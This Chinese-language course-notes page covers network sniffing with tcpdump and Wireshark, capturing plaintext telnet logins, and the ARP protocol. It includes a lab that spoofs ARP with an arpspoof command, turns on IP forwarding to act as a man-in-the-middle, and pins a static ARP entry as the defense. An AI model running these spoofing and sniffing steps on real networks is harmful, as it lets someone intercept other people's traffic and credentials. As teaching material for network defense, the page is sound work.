当前位置: 首页 > news >正文

C++入侵检测与网络攻防之网络嗅探以及ARP攻击

目录

1.tcpdump基本使用

2.tcpdump条件过滤

3.wireshark介绍

4.wireshark的介绍

5.tcp握手挥手分析

6.telnet服务的介绍和部署

7.复习

8.telnet服务的报文嗅探

9.网络嗅探基础

10.arp协议的解析

11.arp攻击原理以及试验环境

12.arp实验以及防御方式


1.tcpdump基本使用

2.tcpdump条件过滤

3.wireshark介绍

4.wireshark的介绍

1 tcpdump

    tcpdump -i <网卡名字>

    如果是使用ssh远程来控制linux 再使用tcpdump进行抓包,导致死循环
    因为每次抓包之后就要显示到ssh客户端上,也会产生通信报文,每次产生通信报文又会被抓包,依次循环


    抓取的报文显示如下
    09:52:02.968593 IP kali.ssh > 192.168.177.1.62564: Flags [P.], seq 5123876:5124232, ack 3349, win 293, options [nop,nop,TS val 4238057456 ecr 643507630], length 356   
    抓包时间  报文类型(IP)  源主机:端口 > 目标主机:端口    报文的摘要     


    -v -vv -vvv 将抓到的报文显示得更加详细

    -w <文件名.pcap> 
        将抓到的报文存成pcap文件, 典型用法是使用tcpdump抓包再拿到wireshark来分析


    过滤条件
        man pacap-filter 可以查看过滤条件的帮助信息
        过滤主机
            tcpdump [src|dst] host <ip>

        过滤端口号
            tcpdump [src|dst] port <端口号>

        过滤协议
            tcpdump tcp|udp|icmp...

        条件与或非  and or not
             tcpdump tcp and src host 220.181.112.244 and src port 80 
 

5.tcp握手挥手分析

2 telnet 
    telnet是一个最简单的tcp客户端,也是一个协议,该协议以前操作linux服务器使用的协议
    现在都用ssh  ,telnet协议不加密,只要能够抓包就能够看到上面的通信的信息

    需求:部署telnet服务器,使用telnet客户端连接上去,输入用户名和密码,让wireshark抓包

    安装telnet服务:
    itcast@itcast $ sudo apt-get install telnet telnetd
    apt-get install xinetd
    vim /etc/xinetd.d/telnet
    内容如下
    service telnet  
    {  
        disable = no  
        flags = REUSE  
        socket_type = stream  
        wait = no  
        user = root  
        server = /usr/sbin/in.telnetd  
        server_args = -h  
        log_on_failure += USERID  
    }    
    /etc/init.d/xinetd restart 重启服务

    使用telnet客户端连接

    telnet <ip>

6.telnet服务的介绍和部署

3 arp协议
    
    共识:发送IP报文 能够让对方机器成功捕获,以太网帧必须要填对方的物理地址

    如果只知道对方的IP地址,而不知道物理地址,就必须使用ARP协议进行解析

    A(192.168.1.1)想知道B机器(192.168.1.2)的物理地址

        1 A发送一个广播报文 ,物理地址是 FF-FF-FF-FF-FF-FF
            包含一个信息:谁是 192.168.1.2 ,回一下我,告诉我你的物理地址是啥

        2 B收到该报文,做ARP回应,发送一个特定报文给A,告诉A他的物理地址

        3 其他机器收到广播报文,不应答

7.复习

4 arp攻击

    实验:实现arp的欺骗

    靶机: 192.168.177.196     00:0c:29:b5:da:67
    ubuntu web服务器: 192.168.177.170   00:0c:29:bf:94:68
    攻击机: 192.168.177.165    00:0c:29:da:bf:07


    靶机 正常情况系能够访问ubuntu的服务 
    攻击机使用ARP攻击靶机,之后靶机要访问ubuntu的服务,就会访问不了


    arpspoof -i <网卡名> -t <欺骗的目标> <我是谁>

    arpspoof -i eth0 -t 192.168.177.196 192.168.177.170


    同时,攻击机可以简单的开启 ip_forward功能将不是自己的ip报文丢给正确的机器
    攻击机作为一个中间人来监听目标机器的通讯行为

    echo 1 > /proc/sys/net/ipv4/ip_forward 

    防御方式:
    写死arp表对应机器的物理地址
    sudo arp -s 192.168.177.170  00:0c:29:bf:94:68

8.telnet服务的报文嗅探

9.网络嗅探基础

10.arp协议的解析

11.arp攻击原理以及试验环境

12.arp实验以及防御方式

相关文章:

  • 铃木一郎女儿是奥运会选手吗·棒球1号位
  • Ethan独立开发产品日报 | 2025-04-24
  • 1、RabbitMQ的概述笔记
  • 传统中台的重生——云原生如何重塑政务系统后端架构
  • 电子级甲基氯硅烷
  • [mysql]窗口函数
  • Java安全之URLDNS链分析
  • 论文阅读:2024 ACL ArtPrompt: ASCII Art-based Jailbreak Attacks against Aligned LLMs
  • 基于线性LDA算法对鸢尾花数据集进行分类
  • 【数据可视化艺术·应用篇】三维管线分析如何重构城市“生命线“管理?
  • BongoCat - 跨平台键盘猫动画工具
  • AI数据分析的利器:解锁BI工具的无限潜力
  • 大模型微调 - transformer架构
  • 全球碳化硅晶片市场深度解析:技术迭代、产业重构与未来赛道争夺战(2025-2031)
  • Linux部署ragflow,从安装docker开始~
  • 斗鱼娱乐电玩平台源码搭建实录
  • 课程9. 机器翻译,Seq2Seq与Attention
  • EasyRTC音视频实时通话嵌入式SDK,打造社交娱乐低延迟实时互动的新体验
  • 嵌入式鸿蒙系统环境搭建与配置要求实现01
  • .NET中,const和readonly区别
  • 白酒瓶“神似”北京第一高楼被判侵权,法院一审判赔45万并停售
  • 五矿地产:今年要确保债务“不爆雷”、交付“不烂尾”
  • 福耀科技大学发布招生章程:专业培养语种为英语,综合改革省份选考需含物化
  • 限时离境、关闭领空、暂停贸易,巴基斯坦宣布一系列对印反制措施
  • 广东省发展改革委原副主任、省能源局原局长吴道闻被开除公职
  • 吉林建筑大学党委原书记崔征接受纪律审查和监察调查